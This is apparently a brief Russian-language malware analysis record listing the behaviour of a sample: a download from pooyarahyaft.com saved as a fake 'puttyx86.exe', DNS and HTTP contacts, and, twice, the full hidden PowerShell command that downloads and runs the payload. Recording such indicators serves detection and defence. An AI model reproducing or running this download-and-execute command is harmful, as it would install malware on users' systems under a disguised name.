Техническая информация
- http://pooyarahyaft.com/amana/anz.exe как %temp%\\puttyx86.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/ANZ.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe
- 'po####ahyaft.com':80
- DNS ASK po####ahyaft.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/ANZ.exe','%TEMP%\\puttyx86.exe') & %TEMP%\\puttyx86.exe' (со скрытым окном)